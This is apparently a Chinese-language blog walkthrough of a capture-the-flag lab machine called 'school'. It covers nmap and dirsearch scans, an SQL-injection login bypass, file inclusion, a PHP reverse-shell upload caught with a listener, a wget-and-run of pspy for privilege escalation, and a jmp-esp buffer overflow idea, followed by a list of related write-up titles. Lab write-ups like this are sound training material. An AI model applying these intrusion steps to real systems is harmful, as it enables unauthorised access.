主机探活

nmap -sP 192.168.159.0/24

目标主机IP为:192.168.159.176

端口发现

nmap -sV -p- -A 192.168.159.176

目标主机开放:22、23、80端口

80端口

目录扫描

dirsearch -u http://192.168.159.176

去主页看看,发现有一个登录窗口,尝试sql注入

成功登陆后台。。。

文件包含

但是在后台并没有找到可以上传文件的地方,不过在寻找过程中发现他好像是文件包含

每个页面的不同之处就在于 page 参数后传的内容。

我在尝试访问一些敏感文件(/etc/passwd等等)无果后,准备 fuzz 跑一下网站可能存在的文件,但是在网页源码中发现了一条注释内容,里面有一个文件:site_settings

访问后发现是个管理页面,可以上传文件

上传php反弹shell文件,发现上传后就开始一直加载了,猜测可能一上传就触发了

本地开启端口监听,成功获得shell

提权

首先就是一套 suid、sudo、计划任务 丝滑小连招,啥都没有找到

信息收集

家目录下有两个用户,可以读,但是里面啥都没有。。。

在网站目录 /etc/www/html/student_attendance 下找到了一个数据库配置文件

在获得 fox 连接数据库的密码后,尝试登录 fox 用户,失败,没有使用同一个密码

之后我也登入了数据库,没有找到什么有用的信息。。。

脚本

wget 192.168.159.131/pspy64
chmod +x pspy64
./pspy64

发现了一个奇怪可疑的文件,它在 /root 目录下,是/bin/sh运行的

刚开始我以为看不了,但试了一下发现能进 /root 文件夹。。。

查看这个文件

Wine 代表 Wine 不是一个模拟器。 它是一套接口,将对 Windows 系统调用指令翻译成对 Linux 和其他类 Unix 系统的 POSIX 系统调用指令

它以 window 命令 在 linux 上执行了一个 exe 文件,我们看看这个程序有没什么问题

后面就要在 windows 下对该程序进行分析,这里我不熟悉,就不写了。。。

最后结果是该程序应该是使用23端口的telnet服务,并且存在缓冲区溢出漏洞,分析后获得相应的 payload,但我不会在 windows上做,就不献丑了。

思路和之前写的 缓冲区溢出 一致,只不过由于在测试机上运行的程序获得的 esp 地址肯定和靶机上的不同,所以主要任务是获取esp地址。

这里采用的方法是:寻找这个程序(以及其动态链接库)中存在的 jmp esp指令的地址,把这个地址放到eip中,即可成功跳转到esp,执行shellcode

缓冲区溢出 一致,只不过由于在测试机上运行的程序获得的 esp 地址肯定和靶机上的不同,所以主要任务是获取esp地址。

这里采用的方法是:寻找这个程序(以及其动态链接库)中存在的 jmp esp指令的地址,把这个地址放到eip中,即可成功跳转到esp,执行shellcode

具体可参考这位大佬blog:(http://vxer.cn/?id=5)

school 靶机 wp相关推荐

  1. kb-vuln3 靶机 wp

    主机发现 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.177 端口探活 nmap -sV -p- -A 192.168.159.177 目标主机开放:2 ...

  2. HTB Meow靶机wp

    TASK 1 首字母缩略词 VM 代表什么? VM的缩写一般是指虚拟机的意思所以答案是Virtual Machine TASK 2 我们使用什么工具与操作系统交互以启动我们的 VPN 连接? 我们在k ...

  3. driftingblues 4 靶机 wp

    主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.186 端口扫描 nmap -sV -p- -A 192.168.159.186 目标靶机开放端口 ...

  4. driftingblues 3靶机 wp

    主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.173 端口发现 nmap -sV -p- -A 192.168.159.173 目标靶机开放端口 ...

  5. driftingblues靶机wp

    主机探活 nmap -sP 192.168.159.0/24 端口扫描 nmap -sV -A -p- 192.168.159.155 发现只开放了 80 和 22 端口 80端口 nikto nik ...

  6. driftingblues 2靶机wp

    主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.165 端口发现 nmap -sP 192.168.159.0/24 开放端口为:21.22.80 ...

  7. Mercury 靶机 wp

    主机探活 nmap -sP 192.168.159.0/24 目标主机IP为:192.168.159.180 端口发现 nmap -sV -p- -A 192.168.159.180 目标主机开放端口 ...

  8. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  9. 更新wpscan_解决新版wpscan无法更新数据库问题

    在做一个靶机时需要用到wpscan,然后以前学习wp漏洞的时候也有看过,但是没有强制性需要,就没管了,所以这次就想着必须给解决掉.ps:这个解决了,靶机wp马上就出来了 在网上百度了一大堆方法都不行, ...

最新文章

  1. db2联邦数据库 linux,DB2创建联邦数据库
  2. Oracle数据库之事务
  3. android contacts电话查询头像,android透过查询电话号码获取联系人头像
  4. html dd自动换行,为什么我的dd里面的内容没有自动换行呢
  5. 你应该知道的Windows复制技术
  6. docker配置 注册中心
  7. python开发怎么成长_Python开发者四大进阶攻略,菜鸟的成神之路
  8. 系统辨识理论及应用_液压系统故障智能诊断方法(2)
  9. (小白)系统盘制作(WPE工具箱)及镜像下载
  10. python爬虫——使用selenium爬取qq群的成员信息(全自动实现自动登陆)
  11. Window下MySQL 8.0重新设置密码
  12. extjs6 表格行选中时去掉默认背景颜色
  13. android 模拟器 派派,派派怎么在电脑上玩?派派电脑版使用教程
  14. 如何做一场有创意的活动策划?
  15. 计算机房 危险源辨识,消防安全重点部位不仅要根据火灾危险源的辨识来确..._消防考试_帮考网...
  16. 【sourcetree】sourcetree连接云效项目,带密码(每个平台可能不一样)
  17. 网络摄像头Rtsp直播方案(二)
  18. IOS开发之开发工具Xcode下载
  19. 盘点几款好用的开源商城系统
  20. 日拱一卒.操作系统基础知识点梳理

热门文章

  1. Windows 11 官方正式版原版镜像【附下载】
  2. 数值分析李庆杨第五章习题
  3. 软文传播技巧 究竟什么是软文推广
  4. 线性代数的本质(1)——基底、向量、线性变换、逆阵、行列式
  5. 聚焦落地应用与商业前景,2018年国内人脸识别应用TOP10排行榜
  6. android操作系统
  7. 载紫杉醇D-α-生育酚聚乙二醇1000琥珀酸酯/纳米粒包裹紫杉醇的肝素纳米粒
  8. 胆酸(Cholate)乳清白蛋白纳米粒Cholate-whey protein|保存条件
  9. linux中的“~”、“/”、“./”分别代表什么?
  10. android 格式化为exfat,Android 4.2是否支持exfat格式U盘?如何使Android支持exfat